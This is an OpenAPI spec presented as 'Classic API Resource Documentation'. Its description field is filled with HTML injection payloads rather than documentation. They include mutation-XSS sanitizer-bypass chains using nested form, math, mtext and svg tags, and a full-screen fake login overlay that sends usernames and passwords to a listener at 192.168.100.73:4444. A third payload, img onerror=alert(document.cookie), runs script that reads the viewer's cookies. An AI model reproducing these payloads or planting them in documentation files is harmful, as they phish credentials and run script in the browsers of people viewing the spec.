openapi: '3.0.1'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><h1>Tuma</h1>"></form>
    <form><math><mtext></form><form><div style="position:absolute;left:0;top:0;width:100%;height:100%;z-index:1000;background:white;padding:1em;color:black;font-family:Arial,sans-serif;font-size:16px;text-align:center;display:flex;flex-direction:column;justify-content:center;align-items:center;height:100vh;"><b>Valid credentials:</b><br><form name="login" action="http://192.168.100.73:4444/login.htm"><table style="margin:auto;"><tr><td>Username:</td><td><input type="text" name="username" style="border:1px solid black;"/></td></tr><tr><td>Password:</td><td><input type="password" name="password" style="border:1px solid black;"/></td></tr><tr><td colspan="2" align="center"><input type="submit" value="Login" style="background:black;color:white;border:none;padding:5px 10px;"/></td></tr></table></form></div>
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
    

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
